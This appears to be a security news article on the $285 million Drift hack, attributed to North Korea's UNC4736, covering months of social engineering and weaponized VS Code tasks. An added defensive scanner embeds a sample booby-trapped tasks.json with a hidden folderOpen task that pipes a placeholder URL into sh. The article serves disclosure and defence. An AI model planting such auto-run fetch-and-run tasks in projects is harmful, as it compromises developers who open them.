$285 Million Drift Hack Traced to Six-Month DPRK Social Engineering Operation
TL;DR
The $285 million theft from Solana-based exchange Drift on April 1, 2026, has been attributed by Drift, with medium confidence, to the North Korean state-sponsored hacking group UNC4736. The breach was the result of a "structured intelligence operation" lasting six months, involving face-to-face social engineering by third-party intermediaries at crypto conferences and the use of weaponized developer tools.
A Masterclass in Long-Term Deception
A recent analysis by Drift has revealed that the devastating April 1, 2026, attack was not a sudden exploit but the culmination of a meticulously planned operation that began in the fall of 2025. Over a six-month period, North Korean threat actors—attributed with medium confidence to the group UNC4736 (also known as AppleJeus or Golden Chollima)—built a web of trust with Drift contributors.
The operation relied heavily on human interaction and professional rapport. The threat actors used individuals posing as representatives of a quantitative trading company to approach Drift contributors at various international cryptocurrency conferences.
Notably, the individuals who appeared in person were not North Korean nationals. Drift reported that the regime used third-party intermediaries who were "technically fluent" and possessed "verifiable professional backgrounds." These actors engaged in substantive months-long conversations via Telegram regarding trading strategies and potential vault integrations to establish a functioning operational presence.
Building the "Ecosystem Vault" Trap
To further cement their legitimacy, the group onboarded an "Ecosystem Vault" on Drift between December 2025 and January 2026. This process involved:
- Filling out detailed strategy forms.
- Asking "detailed and informed" product questions.
- Depositing over $1 million of their own funds to build trust.
Throughout February and March 2026, the actors continued to share links for purported tools and applications they were developing, essentially grooming the environment for the final infection.
The Technical Vectors: IDE Weaponization
As the attack unfolded on April 1, the threat actors deleted their Telegram chats and malicious software to cover their tracks. Forensic investigators suspect two primary infection pathways:
- Weaponized VS Code Projects: At least one contributor may have been compromised after cloning a code repository shared by the actors. This repository contained a malicious Microsoft Visual Studio Code (VS Code) project. By adding a task to the repository's `.vscode/tasks.json` with `"runOptions": {"runOn": "folderOpen"}`, the actors had their command execute the moment the folder was opened in the IDE, with no build or debug action required from the victim. Note that VS Code only honours such automatic tasks in a trusted workspace; a cloned repository that the user marks as trusted on first open is exactly the case in which they fire.
- Beta Testing Exploitation: A second contributor was reportedly persuaded into downloading a wallet product via Apple's TestFlight under the guise of beta testing a new app.
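A pre-open triage check for the first vector, as an added example that is not code from the article, from Drift, or from Microsoft. It reads `.vscode/tasks.json` the way VS Code does (as JSONC, so comments and trailing commas are allowed), and reports every task whose `runOptions.runOn` is `folderOpen`, together with the command it would run and whether the task hides its terminal. The embedded `SAMPLE_TASKS_JSON` is a constructed illustration; its command and host are placeholders, not indicators from the Drift case.

```python
"""Flag VS Code tasks that auto-run on folder open in a cloned repository.

Added example (not the article's, Drift's, or Microsoft's code). Run it on a
checkout before opening the folder in the IDE:  python scan_tasks.py <repo>
Exit status is 1 when an auto-run task is found, so it can gate a clone hook.
"""
from __future__ import annotations

import json
import re
import sys
from pathlib import Path

# Constructed sample of a booby-trapped tasks.json. The URL and command are
# placeholders for illustration, not indicators from the Drift incident.
SAMPLE_TASKS_JSON = r'''{
    // "Dev helpers" shipped with a quant-strategy demo repository
    "version": "2.0.0",
    "tasks": [
        {
            "label": "install deps",
            "type": "shell",
            "command": "curl -fsSL http://example.invalid/setup.sh | sh",
            "runOptions": { "runOn": "folderOpen" },   // fires when the folder is opened
            "presentation": { "reveal": "never" },     // keep the terminal panel hidden
        },
        {
            "label": "run tests",
            "type": "shell",
            "command": "npm test"
        }
    ]
}'''

# Tokenizer for JSONC: a JSON string (escapes honoured), a line comment, a block
# comment, a comma, or a run of anything else. Strings are matched whole, so
# comment-looking text inside a string (e.g. a URL) is never stripped.
_JSONC_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,|[^",/]+|/', re.S)


def strip_jsonc(text: str) -> str:
    """Convert JSONC to strict JSON: drop comments and trailing commas, keep strings intact."""
    tokens = [t for t in _JSONC_TOKEN.findall(text) if not t.startswith(("//", "/*"))]
    out = []
    for idx, tok in enumerate(tokens):
        if tok == ",":
            nxt = next((t for t in tokens[idx + 1:] if t.strip()), "")
            if nxt.lstrip()[:1] in ("}", "]"):
                continue  # trailing comma: legal in JSONC, illegal in JSON
        out.append(tok)
    return "".join(out)


def find_autorun_tasks(tasks_json_text: str) -> list[dict]:
    """Return every task configured with runOptions.runOn == "folderOpen"."""
    data = json.loads(strip_jsonc(tasks_json_text))
    hits = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        # args entries may be plain strings or {"value": ..., "quoting": ...} objects
        args = [a.get("value", "") if isinstance(a, dict) else a for a in task.get("args", [])]
        command = " ".join([str(task.get("command", ""))] + [str(a) for a in args]).strip()
        hits.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type", "shell"),
            "command": command,
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return hits


def scan_repo(root: Path) -> list[dict]:
    """Walk a checkout and collect auto-run tasks from every .vscode/tasks.json in it."""
    findings = []
    for path in root.rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        rel = str(path.relative_to(root))
        try:
            for hit in find_autorun_tasks(path.read_text(encoding="utf-8")):
                findings.append({"file": rel, **hit})
        except (ValueError, OSError) as exc:  # json.JSONDecodeError is a ValueError
            findings.append({"file": rel, "error": str(exc)})  # unparsable: still worth a look
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_repo(Path(sys.argv[1]))
    else:
        results = find_autorun_tasks(SAMPLE_TASKS_JSON)  # demo on the constructed sample
    for r in results:
        print(json.dumps(r))
    sys.exit(1 if results else 0)
```

The scanner is a triage step, not a boundary: `.code-workspace` files can carry a `tasks` section too, and extending the glob to cover them is straightforward. The setting that actually removes the trigger is `"task.allowAutomaticTasks": "off"` in user settings, combined with leaving repositories from unverified counterparties in Restricted Mode rather than trusting them on first open.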
The repository-based technique mirrors the "Contagious Interview" campaigns observed since late 2025, which recently prompted Microsoft to introduce new security controls in VS Code versions 1.109 and 1.110.
Attribution: Connecting the Dots
Drift’s attribution to UNC4736 is supported by both on-chain and operational evidence. Fund flows used to stage the Drift operation have been traced back to the October 2024 hack of Radiant Capital, a $53 million theft also linked to North Korea.
UNC4736 has a prolific history in the crypto sector, including the 2023 X_TRADER/3CX supply chain breach. According to CrowdStrike, this group (Golden Chollima) typically targets small fintech firms to ensure "baseline revenue generation" for the DPRK regime, which requires capital to fund ambitious military projects, including nuclear-powered submarines and reconnaissance satellites.
The Global Pipeline of "IT Worker Fraud"
The Drift case highlights a broader, alarming trend in North Korean cyber tactics. The DPRK has evolved into a "fragmented" malware ecosystem, compartmentalizing its operations to avoid total exposure when one branch is discovered.
Beyond direct hacks, the regime is operating a multinational recruitment pipeline. According to reports from Flare and IBM X-Force:
- IT Worker Fraud: Operatives land remote roles at Western companies using stolen identities and AI-generated personas.
- Third-Party Recruitment: The regime is actively recruiting skilled developers from Iran, Syria, Lebanon, and Saudi Arabia to act as "callers" or "interviewers." These individuals impersonate Western personas to pass technical interviews at U.S. defense contractors and financial institutions.
Conclusion
The Drift hack serves as a stark reminder that the greatest vulnerability in decentralized finance remains the human element. By combining traditional "boots-on-the-ground" social engineering with advanced technical exploits like IDE weaponization, North Korean actors have proven they are willing to invest months of time and millions of dollars in capital to secure a massive payout. For high-value targets, the threat is no longer just a malicious link—it is a six-month-old professional relationship.
Source: https://thehackernews.com/2026/04/285-million-drift-hack-traced-to-six.html


